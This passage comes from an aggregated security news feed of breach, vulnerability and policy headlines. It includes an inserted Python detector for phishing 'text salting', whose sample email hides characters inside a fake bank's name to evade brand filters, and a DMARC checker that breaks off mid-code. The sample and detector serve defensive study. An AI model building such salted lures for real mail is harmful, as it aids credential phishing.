The post Git Vulnerabilities Led to Credentials Exposure appeared first on SecurityWeek.

Change Healthcare Data Breach Impact Grows to 190 Million Individuals

The impact of the Change Healthcare ransomware-caused data breach has increased from 100 million to 190 million individuals.

The post Change Healthcare Data Breach Impact Grows to 190 Million Individuals appeared first on SecurityWeek.

Subaru Starlink Vulnerability Exposed Cars to Remote Hacking

A vulnerability in Subaru’s Starlink connected vehicle service exposed US, Canada, and Japan vehicle and customer accounts.

The post Subaru Starlink Vulnerability Exposed Cars to Remote Hacking appeared first on SecurityWeek.

North Korean Fake IT Workers More Aggressively Extorting Enterprises

North Korean fake IT workers are more aggressively extorting their employers in response to law enforcement actions.

The post North Korean Fake IT Workers More Aggressively Extorting Enterprises appeared first on SecurityWeek.

In Other News: VPN Supply Chain Attack, PayPal $2M Settlement, RAT Builder Hacks Script Kiddies

Noteworthy stories that might have slipped under the radar: Korean VPN supply chain attack, PayPal settles with New York for $2 million, trojanized RAT builder targets script kiddies.

The post In Other News: VPN Supply Chain Attack, PayPal $2M Settlement, RAT Builder Hacks Script Kiddies appeared first on SecurityWeek.

Sweden seizes cargo ship after another undersea cable hit in suspected sabotage

NATO increasing patrols in the Baltic as region awaits navy drones

Swedish authorities have "seized" a vessel – believed to be the cargo ship Vezhen – "suspected of carrying out sabotage" after a cable running between Sweden and Latvia in the Baltic Sea was damaged on the morning of January 26.…

CDNs: Great for speeding up the internet, bad for location privacy

Also, Subaru web portal spills user deets, Tornado Cash sanctions overturned, a Stark ransomware attack, and more

Infosec in brief  Using a custom-built tool, a 15-year-old hacker exploited Cloudflare's content delivery network to approximate the locations of users of apps like Signal, Discord, and others.…

British Museum says ex-contractor 'shut down' IT systems, wreaked havoc

Former freelancer cuffed a week after being dismissed by UK's top visitor attraction

The British Museum was forced to temporarily close some galleries and exhibitions this weekend after a disgruntled former tech contractor went rogue and shuttered some onsite IT systems.…

Someone is slipping a hidden backdoor into Juniper routers across the globe, activated by a magic packet

Who could be so interested in chips, manufacturing, and more, in the US, UK, Europe, Russia...

Someone has been quietly backdooring selected Juniper routers around the world in key sectors including semiconductor, energy, and manufacturing, since at least mid-2023.…

UK telco TalkTalk confirms probe into alleged data grab underway

Spinner says crim's claims 'very significantly overstated'

UK broadband and TV provider TalkTalk says it's currently investigating claims made on cybercrime forums alleging data from the company was up for grabs.…

AI chatbot startup founder, lawyer wife accused of ripping off investors in $60M fraud

GameOn? It's looking more like game over for that biz

The co-founder and former CEO of AI startup GameOn is in a pickle. After exiting the top job last year under a cloud, he's now in court – along with his wife – for allegedly bilking his company and its investors out of more than $60 million.…

Don't want your Kubernetes Windows nodes hijacked? Patch this hole now

SYSTEM-level command injection via API parameter *chef's kiss*

A now-fixed command-injection bug in Kubernetes can be exploited by a remote attacker to gain code execution with SYSTEM privileges on all Windows endpoints in a cluster, and thus fully take over those systems, according to Akamai researcher Tomer Peled.…

North Korean dev who renamed himself 'Bane' accused of IT worker fraud caper

5 indicted as FBI warns North Korea dials up aggression, plus Russian devs allegedly get in on the act

The US is indicting yet another five suspects it believes were involved in North Korea's long-running, fraudulent remote IT worker scheme – including one who changed their last name to "Bane" and scored a gig at a tech biz in San Francisco.…

China and friends claim success in push to stamp out tech support cyber-scam slave camps

Paint a target on Myanmar, pledge more info-sharing to get the job done

A group established by six Asian nations to fight criminal cyber-scam slave camps that infest the region claims it’s made good progress dismantling the operations.…

Court rules FISA Section 702 surveillance of US resident was unconstitutional

'Public interest alone does not justify warrantless querying' says judge

It was revealed this week a court in New York made a landmark ruling that sided against the warrantless state surveillance of people's private communications in America.…

One of Salt Typhoon's favorite flaws still wide open on 91% of at-risk Exchange Servers

But we mean, you've had nearly four years to patch

One of the critical security flaws exploited by China's Salt Typhoon to breach US telecom and government networks has had a patch available for nearly four years - yet despite repeated warnings from law enforcement and private-sector security firms, nearly all public-facing Microsoft Exchange Server instances with this vulnerability remain unpatched.…

Patch now: Cisco fixes critical 9.9-rated, make-me-admin bug in Meeting Management

No in-the-wild exploits … yet

Cisco has pushed a patch for a critical, 9.9-rated vulnerability in its Meeting Management tool that could allow a remote, authenticated attacker with low privileges to escalate to administrator on affected devices.…

SonicWall flags critical bug likely exploited as zero-day, rolls out hotfix

Big organizations and governments are main users of these gateways

SonicWall is warning customers of a critical vulnerability that was potentially already exploited as a zero-day.…

Meta's pay-or-consent model under fire from EU consumer group

Company 'strongly disagrees' with law infringement allegations

Meta has again come under fire for its pay-or-consent model in the EU.…

FortiGate config leaks: Victims' email addresses published online

Experts warn not to take SNAFU lightly as years-long compromises could remain undetected

Thousands of email addresses included in the Belsen Group's dump of FortiGate configs last week are now available online, revealing which organizations may have been impacted by the 2022 zero-day exploits.…

Who is DDoSing you? Rivals, probably, or cheesed-off users

Plus: 'Largest-ever' duff traffic tsunami clocks in at 5.6 Tbps

In addition to Chinese spies invading organizations' networks and ransomware crews locking up sensitive files, botnets blasting distributed denial of service (DDoS) attacks can still cause a world of hurt — and website downtime — and it's quite likely your competitors are to blame.…

Biz tax rises, inflation and high interest. Why fewer UK tech firms started in 2024

And the government thinks that AI and taking shackles off big tech will help? God help Britain

For the first time since the start of the pandemic, the number of tech firms incorporated in the UK has declined, with a shrinking economy, as well as high inflation and interest rates causing a slump in business confidence.…

Asus lets processor security fix slip out early, AMD confirms patch in progress

Answers on a postcard to what 'Microcode Signature Verification Vulnerability' might mean

AMD has confirmed at least some of its microprocessors suffer a microcode-related security vulnerability, the existence of which accidentally emerged this month after a fix for the flaw appeared in a beta BIOS update from PC maker Asus.…

Oracle emits 603 patches, names one it wants you to worry about soon

Old flaws that keep causing trouble haunt Big Red

Oracle has delivered its regular quarterly collection of patches: 603 in total, 318 for its own products, and another 285 for Linux code it ships.…

Trump 'waved a white flag to Chinese hackers' as Homeland Security axed cyber advisory boards

And: America 'has never been less secure,' retired rear admiral tells Congress

The Trump administration gutted key cybersecurity advisory boards in its first days, as expert witnesses warned Congress of potentially destructive cyberattacks by China.…

Supply chain attack hits Chrome extensions, could expose millions

Threat actor exploited phishing and OAuth abuse to inject malicious code

Cybersecurity outfit Sekoia is warning Chrome users of a supply chain attack targeting browser extension developers that has potentially impacted hundreds of thousands of individuals already.…

Give users confidence in your digital infrastructure

Why Digital Trust and crypto-agility are essential to authentication and data security

Sponsored Post  Research firm IDC estimates that over 53 percent of organizations are now mostly or completely digital native.…

Microsoft issues out-of-band fix for Windows Server 2022 NUMA glitch

Update addresses boot failures on multi-node systems

Microsoft is releasing an out-of-band patch to deal with a problem that prevented some Windows Server 2022 machines from booting.…

Silk Road's Dread Pirate Roberts walks free as Trump pardons dark web kingpin

Ross Ulbricht's family are now appealing for donations to support his reintegration into society

Silk Road founder Ross Ulbricht is now a free man after US President Donald Trump made good on his promise to issue a federal pardon upon taking office.…

Infosec was literally the last item in Trump's policy plan, yet major changes are likely on his watch

Everyone agrees defense matters. How to do it is up for debate

Feature  The Trump administration came to office this week without a detailed information security policy, but analysis of cabinet nominees’ public remarks and expert comments suggest it will make significant changes in the field.…

Ransomware scum make it personal for Reg readers by impersonating tech support

That invitation to a Teams call on which IT promises to mop up a spamstorm may not be what it seems

Two ransomware campaigns are abusing Microsoft Teams to infect organizations and steal data, and the crooks may have ties to Black Basta and FIN7, according to Sophos.…

Read More
PowerSchool theft latest: Decades of Canadian student records, data from 40-plus US states feared stolen
PowerSchool theft latest: Decades of Canadian student records, data from 40-plus US states feared stolen

Lawsuits pile up after database accessed by miscreants

Updated  Canada's largest school board has revealed that student records dating back to 1985 may have been accessed by miscreants who compromised software provider PowerSchool.…

Read More
Patch procrastination leaves 50,000 Fortinet firewalls vulnerable to zero-day

Seven days after disclosure and little action taken, data shows

Fortinet customers need to get with the program and apply the latest updates as nearly 50,000 management interfaces are still vulnerable to the latest zero-day exploit.…

Read More
HPE probes IntelBroker's bold data theft boasts

Incident response protocols engaged following claims of source code burglary

Hewlett Packard Enterprise (HPE) is probing assertions made by prolific Big Tech intruder IntelBroker that they broke into the US corporation's systems and accessed source code, among other things.…

Read More
Banks must keep ahead of risks and reap AI rewards

AI has transformed banking across APAC. But is this transformation secure?

Partner Content  The banking industry in Asia Pacific (APAC) is thriving, with strong financial performance underpinning its technological ambitions.…

Read More
Hackers game out infowar against China with the US Navy

Taipei invites infosec bods to come and play on its home turf

Picture this: It's 2030 and China's furious with Taiwan after the island applies to the UN to be recognized as an independent state. After deciding on a full military invasion, China attempts to first cripple its rebellious neighbor's critical infrastructure.…

Read More
How to leave the submarine cable cutters all at sea – go Swedish

Clear rules and guaranteed consequences concentrate the mind wonderfully. Just ask a Russian

Opinion  "As obsolete as warships in the Baltic" was a great pop lyric in Prefab Sprout's 1985 gem, Faron Young. Great, but ironically obsolete itself. Sweden has just deployed multiple warships in that selfsame sea to guard against the very modern menace of underwater cable cutting.…

Read More
Ransomware attack forces Brit high school to shut doors

Students have work to complete at home in the meantime

A UK high school will have to close for at least two days, today and tomorrow, after becoming the latest public-sector victim of ransomware criminals.…

Read More
Sage Copilot grounded briefly to fix AI misbehavior

'Minor issue' with showing accounting customers 'unrelated business information' required repairs

Sage Group plc has confirmed it temporarily suspended its Sage Copilot, an AI assistant for the UK-based business software maker's accounting tools, this month after it blurted customer information to other users.…

Read More
Datacus extractus: Harry Potter publisher breached without resorting to magic

PLUS: Allstate sued for allegedly tracking drivers; Dutch DDoS; More fake jobs from Pyongyang; and more

Infosec in brief  Hogwarts doesn’t teach an incantation that could have saved Harry Potter publisher Scholastic from feeling the power of an online magician who made off with millions of customer records - except perhaps the wizardry of multifactor authentication.…

Read More
When food delivery apps reached Indonesia, everyone put on weight

PLUS: Salt Typhoon and IT worker scammers sanctioned; Alibaba Cloud’s K8s go global; Amazon acquires Indian BNPL company

Asia In Brief  When food delivery “superapps” started operations in Indonesia, users started putting on weight – and that’s not an entirely bad thing.…

Read More
Donald Trump proposes US govt acquire half of TikTok, which thanks him and restores service

The same Florida Man who wanted to ban the app in the first place

US president-elect Donald Trump appears to have proposed the government he will soon lead should acquire half of made-in-China social media service TikTok’s stateside operations.…

Read More
OpenAI's ChatGPT crawler can be tricked into DDoSing sites, answering your queries

The S in LLM stands for Security

OpenAI's ChatGPT crawler appears to be willing to initiate distributed denial of service (DDoS) attacks on arbitrary websites, a reported vulnerability the tech giant has yet to acknowledge.…

Read More
FCC to telcos: By law you must secure your networks from foreign spies. Get on it

Plus: Uncle Sam is cross with this one Chinese biz over Salt Typhoon mega-snooping

Decades-old legislation requiring American telcos to lock down their systems to prevent foreign snoops from intercepting communications isn't mere decoration on the pages of law books – it actually means carriers need to secure their networks, the FCC has huffed.…

Read More
Biden signs sweeping cybersecurity order, just in time for Trump to gut it

Ransomware, AI, secure software, digital IDs – there's something for everyone in the presidential directive

Analysis  Joe Biden, in the final days of his US presidency, issued another cybersecurity order that is nearly as vast in scope as it is late in the game.…

Read More
Fortinet: FortiGate config leaks are genuine but misleading

Competition hots up with Ivanti over who can have the worst start to a year

Fortinet has confirmed that previous analyses of records leaked by the Belsen Group are indeed genuine FortiGate configs stolen during a zero-day raid in 2022.…

Read More
Clock ticking for TikTok as US Supreme Court upholds ban

With Biden reportedly planning to skirt enforcement and kick the can to Trump, this saga might still not be over

Updated  The US Supreme Court has upheld a law requiring TikTok to either divest from its Chinese parent ByteDance or face a ban in the United States. The decision eliminates the final legal obstacle to the federal government forcing a shutdown of the platform for US users on January 19.…

Read More
Six vulnerabilities in ubiquitous rsync tool announced and fixed in a day

Turns out tool does both file transfers and security fixes fast

Don't panic. Yes, there were a bunch of CVEs, affecting potentially hundreds of thousands of users, found in rsync in early December – and made public on Tuesday – but a fixed version came out the same day, and was further tweaked for better compatibility the following day.…

Read More
Medusa ransomware group claims attack on UK's Gateshead Council

Pastes allegedly stolen documents on leak site with £600K demand

Another year and yet another UK local authority has been pwned by a ransomware crew. This time it's Gateshead Council in North East England at the hands of the Medusa group.…

Read More
Microsoft eggheads say AI can never be made secure – after testing Redmond's own products

If you want a picture of the future, imagine your infosec team stamping on software forever

Microsoft brainiacs who probed the security of more than 100 of the software giant's own generative AI products came away with a sobering message: The models amplify existing security risks and create new ones.…

Read More
Just as your LLM once again goes off the rails, Cisco, Nvidia are at the door smiling

Some of you have apparently already botched chatbots or allowed ‘shadow AI’ to creep in

Cisco and Nvidia have both recognized that as useful as today's AI may be, the technology can be equally unsafe and/or unreliable – and have delivered tools in an attempt to help address those weaknesses.…

Read More
GM parks claims that driver location data was given to insurers, pushing up premiums

We'll defo ask for permission next time, automaker tells FTC

General Motors on Thursday said that it has reached a settlement with the FTC "to address privacy concerns about our now-discontinued Smart Driver program."…

Read More
Russia's Star Blizzard phishing crew caught targeting WhatsApp accounts

FSB cyberspies venture into a new app for espionage, Microsoft says

Updated  Star Blizzard, a prolific phishing crew backed by the Russian Federal Security Service (FSB), conducted a new campaign aiming to compromise WhatsApp accounts and gain access to their messages and data, according to Microsoft.…

Read More
Enzo Biochem settles lawsuit over 2023 ransomware attack for $7.5M

That's in addition to the $4.5M fine paid to three state AGs last year

Enzo Biochem has settled a consolidated class-action lawsuit relating to its 2023 ransomware incident for $7.5 million.…

Read More
Raspberry Pi hands out prizes to all in the RP2350 Hacking Challenge

Power-induced glitches, lasers, and electromagnetic fields are all tools of the trade

Raspberry Pi has given out prizes for extracting a secret value from the one-time-programmable (OTP) memory of the Raspberry Pi RP2350 microcontroller – awarding a pile of cash to all four entrants.…

Read More
Hidden Text Salting Disrupts Brand Name Detection Systems

A new phishing tactic has been identified by Cisco Talos, using hidden text salting to evade email security measures
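The item above names the tactic but not the mechanics. Text salting, in the general form a mail filter has to cope with, is the insertion of characters that a human never sees (zero-width code points, spans hidden with inline CSS) in the middle of a brand name, so a string match on the raw body misses it. The following is an added example, written for this page and not code from Cisco Talos or any product: it renders the HTML the way a mail client would, strips the invisible material, and flags a message whose brand hits only appear after rendering. The sample message, the "Acme Bank" brand and the watch list are constructed for illustration.

```python
import re
import html
from html.parser import HTMLParser

# Constructed sample, not from the Talos write-up: a phishing body impersonating a
# hypothetical "Acme Bank", with hidden spans and a zero-width space splitting the name.
SAMPLE_HTML = """
<p>Dear customer, your Ac<span style="display:none">xyz</span>me B<span style="font-size:0">qq</span>ank account
is locked. Log in at <a href="https://acme-bank-login.example">Acme&#8203;Bank</a></p>
"""

BRANDS = ["acme bank", "acmebank"]  # hypothetical watch list

# Zero-width / invisible code points commonly used to split keywords.
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"), None)

# Inline CSS that renders an element invisible (display:none, font-size:0, opacity:0 ...).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|font-size\s*:\s*0(?:px|pt|em|%)?(?![\d.])"
    r"|opacity\s*:\s*0(?:\.0+)?(?![\d.])",
    re.I,
)

VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "wbr"}


class _VisibleText(HTMLParser):
    """Collect the text a mail client would render; count characters inside hidden elements."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hidden_depth = 0
        self.parts = []
        self.hidden_chars = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        # Once inside a hidden element, every nested element is hidden too.
        if self.hidden_depth or HIDDEN_STYLE.search(style):
            self.hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.hidden_depth:
            self.hidden_depth -= 1

    def handle_data(self, data):
        if self.hidden_depth:
            self.hidden_chars += len(data)
        else:
            self.parts.append(data)


def render(html_body):
    """Return (visible text, chars inside hidden elements, zero-width chars removed)."""
    p = _VisibleText()
    p.feed(html_body)
    p.close()
    joined = "".join(p.parts)
    stripped = joined.translate(ZERO_WIDTH)
    text = re.sub(r"\s+", " ", stripped).strip()
    return text, p.hidden_chars, len(joined) - len(stripped)


def find_brands(text, brands=BRANDS):
    low = text.lower()
    return [b for b in brands if b in low]


def analyse(html_body):
    """Compare brand hits on raw markup with hits on rendered text.

    Brand names that appear only after rendering, in a message that also carries
    hidden or zero-width material, are the signature of salting."""
    raw_hits = find_brands(html.unescape(html_body))
    text, hidden_chars, zw_chars = render(html_body)
    rendered_hits = find_brands(text)
    salted = (hidden_chars + zw_chars) > 0 and bool(set(rendered_hits) - set(raw_hits))
    return {
        "rendered_text": text,
        "raw_hits": raw_hits,
        "rendered_hits": rendered_hits,
        "hidden_chars": hidden_chars,
        "zero_width_chars": zw_chars,
        "salted": salted,
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_HTML))
```

The useful signal is the gap between the two match passes, not either pass alone: a legitimate statement mail matches the brand both ways and carries no hidden text, so it is not flagged.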

Read More
New Phishing Campaign Targets Mobile Devices with Malicious PDFs

A novel phishing campaign identified by Zimperium targets mobile users with malicious PDFs, impersonating USPS to steal credentials

Read More
SaaS Breaches Skyrocket 300% as Traditional Defenses Fall Short

Obsidian found that threat actors are focusing on SaaS applications to steal sensitive data, with most organizations' security measures not set up to deal with these attacks

Read More
CISOs Boost Crisis Simulation Budgets Amid High-Profile Cyber-Attacks

74% of CISOs plan to increase their cyber crisis simulation budgets in 2025

Read More
Subaru Bug Enabled Remote Vehicle Tracking and Hijacking

A now-patched vulnerability could have enabled threat actors to remotely control Subaru cars

Read More
Change Healthcare Breach Almost Doubles in Size to 190 Million Victims

Change Healthcare has claimed 190 million customers were affected by a mega-breach last year

Read More
AWS Announces £5m Grant for Cyber Education in the UK

Amazon Web Services has launched its Cyber Education Grant Program in the UK

Read More
Russian Scammers Target Crypto Influencers with Infostealers

Crazy Evil, a group of crypto scammers, exploit NFTs and cryptocurrencies with malware targeting influencers and tech professionals

Read More
North Korean IT Workers Holding Data Hostage for Extortion, FBI Warns

A new FBI advisory warned that North Korean IT worker schemes have escalated their activities in recent months to include data extortion

Read More
Ransomware Gangs Linked by Shared Code and Ransom Notes

SentinelOne researchers highlighted similarities in the approaches used by the HellCat and Morpheus ransomware groups, suggesting shared infrastructure

Read More
Chained Vulnerabilities Exploited in Ivanti Cloud Service Appliances

Threat actors chained Ivanti CSA vulnerabilities for RCE, credential theft & webshell deployment

Read More
Bookmakers Ramp Up Efforts to Combat Arbitrage Betting Fraud

Arbitrage betting fraud rises, forcing bookmakers to adopt stricter measures against automated scams

Read More
5,000+ SonicWall firewalls still open to attack (CVE-2024-53704)

5,000+ SonicWall firewalls are still vulnerable to attack via a high-severity vulnerability (CVE-2024-53704) that, according to SonicWall, should be considered “at imminent risk of exploitation”. The warning came last week from Bishop Fox researchers, after they successfully exploited the vulnerability on unpatched SonicWall firewalls and announced they will be releasing details of their exploit code on February 10. “Although significant reverse-engineering effort was required to find and exploit the vulnerability, the exploit itself is rather … More

The post 5,000+ SonicWall firewalls still open to attack (CVE-2024-53704) appeared first on Help Net Security.

Read More
Silobreaker Tickets empowers intelligence teams with AI-augmented tools

Silobreaker launched Tickets, a workflow management feature designed to elevate the efficiency, collaboration and impact of intelligence teams. Tickets is built with native support for Threat Intelligence teams, offering robust capabilities to manage and fulfil intelligence requirements across cyber, geopolitical and physical security domains – all supported by AI-driven insights. Tickets empowers teams of all sizes to prioritise and manage both incoming Requests for Information (RFI) and outbound incidents, which are surfaced from Silobreaker’s extensive … More

The post Silobreaker Tickets empowers intelligence teams with AI-augmented tools appeared first on Help Net Security.

Read More
AI security posture management will be needed before agentic AI takes hold

As I’m currently knee deep in testing agentic AI in all its forms, as well as new iterations of current generative AI models such as OpenAI’s O1, the complexities of securing AI bot frameworks for enterprise security teams are beginning to crystallize.

The post AI security posture management will be needed before agentic AI takes hold appeared first on Help Net Security.

Read More
Don’t let these open-source cybersecurity tools slip under your radar

This article showcases free, open-source cybersecurity tools that help you identify and address vulnerabilities, detect intrusions, protect websites from cyber attacks, and monitor and detect suspicious activity across your network. Am I Isolated: Open-source container security benchmark Am I Isolated is an open-source container security benchmark that probes users’ runtime environments and tests for container isolation. Argus: Open-source information gathering toolkit Argus is an open-source toolkit that simplifies information gathering and reconnaissance. It features a user-friendly … More

The post Don’t let these open-source cybersecurity tools slip under your radar appeared first on Help Net Security.

Read More
Cyber trends set to influence business strategies

Diligent convened a group of 65 board members, C-suite executives, and leading subject matter experts to explore topics shaping the future of business: generative AI, cybersecurity and data privacy, geopolitical risk, and financial fraud and abuse. In this Help Net Security video, Dottie Schindlinger, Executive Director of the Diligent Institute, discusses how 2025 presents boards with a technological headache and how these topics will shape cyber strategies at a board level across the new year … More

The post Cyber trends set to influence business strategies appeared first on Help Net Security.

Read More
How to use Apple’s App Privacy Report to monitor data tracking

The App Privacy Report, which Apple introduced in iOS 15.2, allows users to monitor how apps access data and interact with third-party services. The report provides an in-depth analysis of the types of sensitive data accessed by apps, the external domains they communicate with, and the extent to which apps utilize Apple’s App Tracking Transparency (ATT) to request user consent for tracking activity across other apps and websites. Here’s a step-by-step guide on how to … More

The post How to use Apple’s App Privacy Report to monitor data tracking appeared first on Help Net Security.

Read More
Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. Ransomware attackers are “vishing” organizations via Microsoft Teams The “email … More

The post Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams appeared first on Help Net Security.

Read More
North Korean IT workers are extorting employers, FBI warns

The FBI is on a mission to raise awareness about the threat that North Korean IT workers present to organizations in the US and around the world. While corporate espionage comes to mind first, the threat goes beyond that: “In recent months, in addition to data extortion, FBI has observed North Korean IT workers leveraging unlawful access to company networks to exfiltrate proprietary and sensitive data, facilitate cyber-criminal activities, and conduct revenue-generating activity on behalf … More

The post North Korean IT workers are extorting employers, FBI warns appeared first on Help Net Security.

Read More
Aviat Networks enhances software cybersecurity offering

Aviat Networks announced that it has enhanced its Secure Software Development Lifecycle (SSDLC) process and Software Vulnerability Alert (SVA) service, designed to strengthen Aviat’s software and firmware development process and comply with the latest cybersecurity requirements. With the increasing number of vulnerabilities, threats and attacks, SSDLC and SVA are now seen as essential countermeasures against software security threats to critical communications networks. Aviat’s SSDLC is a structured process to improve cybersecurity for all Aviat … More

The post Aviat Networks enhances software cybersecurity offering appeared first on Help Net Security.

Read More
Nearly half of CISOs now report to CEOs, showing their rising influence

The CISO’s rise to the C-suite comes with more engagement with the boardroom, an audience with the CEO, and the power to make strategic decisions for the business, according to Splunk. CISOs report to the C-suite (Source: Splunk) 82% of surveyed CISOs now report directly to the CEO, a significant increase from 47% in 2023. In addition, 83% of CISOs participate in board meetings somewhat often or most of the time. While 60% acknowledge that … More

The post Nearly half of CISOs now report to CEOs, showing their rising influence appeared first on Help Net Security.

Read More
Exabeam Extends Generative AI Reach to LogRhythm SIEM

Exabeam has extended the reach of its generative artificial intelligence (GenAI) capabilities to its LogRhythm security information and event management (SIEM) platform, which is designed to be deployed by internal IT teams.

The post Exabeam Extends Generative AI Reach to LogRhythm SIEM appeared first on Security Boulevard.

Read More
Humans are the Beating Heart of the Autonomous SOC

Ultimately, the goal of the autonomous SOC is to create a more efficient and effective security environment where human analysts and AI work together to achieve a higher level of security than either could achieve alone. Working together, each improves the other.

The post Humans are the Beating Heart of the Autonomous SOC appeared first on Security Boulevard.

Read More
Do You Know What Your Assets Are?

Asset awareness is the first step in understanding your complete security posture. If you don’t know what assets you own, how can you protect them? 

The post Do You Know What Your Assets Are? appeared first on Security Boulevard.

Read More
Are Third-Party Risk Management Solutions Effective Enough?

A modern EASM solution offers more by incorporating meaningful first-party and third-party cyber risk insights than conventional TPRM solutions.

The post Are Third-Party Risk Management Solutions Effective Enough? appeared first on Security Boulevard.

Read More
Data Privacy Day 2025: A Chance to Take Control of Your Data

madhav
Mon, 01/27/2025 - 09:19

Trust is the cornerstone of every successful relationship between businesses and their customers. On this Data Privacy Day, we reflect on the pivotal role trust plays in the digital age. It’s earned not just through excellent products or services but also through a steadfast commitment to protecting the data consumers share.

When businesses take control of their data practices—prioritizing transparency, security, and compliance—they send a powerful message: "We value your privacy." By championing data privacy, organizations don’t just meet regulatory obligations; they build enduring loyalty, ensuring customers feel secure in every interaction. After all, trust begins with safeguarding what matters most.

The Biggest Challenge in Security Today: Data Sovereignty

Data privacy is shaped by the principle of data sovereignty: the idea that data is governed by the laws of the country in which it originated. This can help or hinder data privacy, but in general regulations have strongly favored consumer data privacy rights and the responsibility of organizations to keep private data safe.

However, the game is changing as companies ingest data to power their AI models. In the wake of breakneck advancements like Generative AI, the cement has yet to harden on the correct governance of these policies, leaving data privacy in the lurch as questions of data sovereignty are being settled – even as companies continue to move ahead.

A recent Thales report, Data Sovereignty: Who Owns Your Data and Can You Control It?, states, “The dominance of a small number of large technology companies is considered the driving force fueling the urgency of addressing data sovereignty.” Because data is today’s oil, and power follows money, the companies that own the data wield a proportionate amount of power. In the words of the report, “These companies control vast quantities of user data, giving them considerable influence over privacy, data protection, and the digital environment.” This is why coming up with answers to pressing data sovereignty issues is “not just a legal obligation but a strategic necessity for businesses.”

While the advent of AI in this space could be perceived as a challenge to data privacy, the attention it draws to the topic is also a timely boon. AI may bring the issue to the fore, but the data privacy problem needs to be addressed regardless, and it ties directly into the question of “Who controls your data?”

As companies strive to meet regulatory guidelines, maintaining proper data control is arguably the most important focus of all strategic security initiatives. Not only is it essential in a legal context, but it is also vastly important to consumers.

Consumers Do Business With Organizations That Protect Their Privacy

It is no surprise that today’s consumers want to do business with companies that share their position on how data should be valued, protected, and preserved. Chris Harris, Thales Associate VP, Sales Engineering, noted, “Data privacy remains as a key factor in our perception of whether or not to trust a company.” Within a professional context, trust means business.

In the Thales 2024 Digital Trust Index, “The majority [of respondents] (89%) would consent for organizations to use their data – but only if certain caveats are met.” In other words, you can use my data, but on my terms. Given that consumers’ data is an inroad into their lives (and they know what it’s worth), this attitude only makes sense.

That means that companies that want to stay competitive need to play ball. It is no longer an option to keep users in the dark about where their data is going (not in the compliance world, and not in the intangible world of customer satisfaction). Today, “as many as 87% of consumers also expect basic levels of data privacy to be met,” and they don’t want to suffer for it; more than a fifth (22%) will give up within sixty seconds if they encounter frustrating privacy-promoting practices like password resets and re-entering personal information.

It’s a tough road for companies to walk, but one that they must figure out how to navigate nonetheless if they want to stay at the forefront and give today’s consumers what they want: a frictionless, secure user experience. The right tools must be in place to balance these seemingly contradictory (or at least complicated) demands.

Maintaining Data Control When Odds Stack Against You

Companies wanting to keep that competitive edge (with privacy increasingly being the deciding factor) would do well to invest in data privacy measures, from employee awareness programs and basic data protection hygiene techniques to more advanced protections to maintain the necessary control of their customers’ data.

Thales offers a comprehensive portfolio of products to secure a world powered by applications, data, and digital identities. All these solutions communicate a strong signal, ‘We care about your data and who has access to it.’ Plus, they offer more than just security; they enhance customer experience, removing the friction that would cause individuals to jump ship.

The ability to give users what they want while offering them the privacy they need is a juggling act, but one that organizations are being asked to do in today’s fast-moving, privacy-conscious world. Data Privacy Day 2025 puts a spotlight on these demands, and data privacy tools from Thales can help companies carry them out.

For more in-depth insights on maintaining data control, download our 2024 Data Security Directions Council Report.

The post Data Privacy Day 2025: A Chance to Take Control of Your Data appeared first on Security Boulevard.

Read More
DMARC Email Security: A Guide to Protecting Your Domain

Learn how DMARC email security can protect your brand, improve deliverability, and prevent phishing attacks. Get expert advice and best practices.
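A DMARC policy is just a TXT record at `_dmarc.<domain>`, and most of the protection the guide above promises comes down to three tags: `p=` (what receivers do with mail that fails alignment), `pct=` (how much of that mail the policy actually applies to) and `rua=` (where aggregate reports go). The following is an added example, written for this page rather than taken from the guide or any DMARC tool: a small checker that parses a record the way a receiver does and separates hard errors (receivers ignore the record) from weak settings (the record works but protects little). The domain names and records are constructed for the example, not real DNS data.

```python
import re
from dataclasses import dataclass, field

# Constructed sample TXT records for hypothetical domains (not real DNS data).
SAMPLE_RECORDS = {
    "_dmarc.example.com": "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
    "_dmarc.shop.example": ("v=DMARC1; p=reject; rua=mailto:agg@shop.example; "
                            "ruf=mailto:fo@shop.example; adkim=s; aspf=s; pct=100"),
    "_dmarc.weak.example": "v=DMARC1; p=quarantine; pct=10",
    "_dmarc.broken.example": "p=reject; v=DMARC1",
}

POLICIES = {"none", "quarantine", "reject"}
ALIGNMENT = {"r", "s"}
MAILTO = re.compile(r"^mailto:[^@\s,]+@[^@\s,]+$", re.I)


@dataclass
class Assessment:
    valid: bool                                   # structurally usable by receivers
    tags: dict = field(default_factory=dict)
    errors: list = field(default_factory=list)    # receivers will ignore the record
    warnings: list = field(default_factory=list)  # record works but protects little


def parse_tags(record):
    """Split 'k=v; k=v' into a dict; raise on a malformed pair."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        k, v = part.split("=", 1)
        tags[k.strip().lower()] = v.strip()
    return tags


def assess(record):
    a = Assessment(valid=False)
    try:
        a.tags = parse_tags(record)
    except ValueError as e:
        a.errors.append(str(e))
        return a
    # RFC 7489: v=DMARC1 must be the first tag and p= is required.
    first = record.strip().split(";", 1)[0].replace(" ", "").lower()
    if first != "v=dmarc1":
        a.errors.append("v=DMARC1 must be the first tag")
    policy = a.tags.get("p")
    if policy not in POLICIES:
        a.errors.append("p= missing or not one of none/quarantine/reject")
    if a.errors:
        return a
    a.valid = True
    if policy == "none":
        a.warnings.append("p=none: monitoring only, spoofed mail is still delivered")
    pct = a.tags.get("pct", "100")
    if not pct.isdigit() or not 0 <= int(pct) <= 100:
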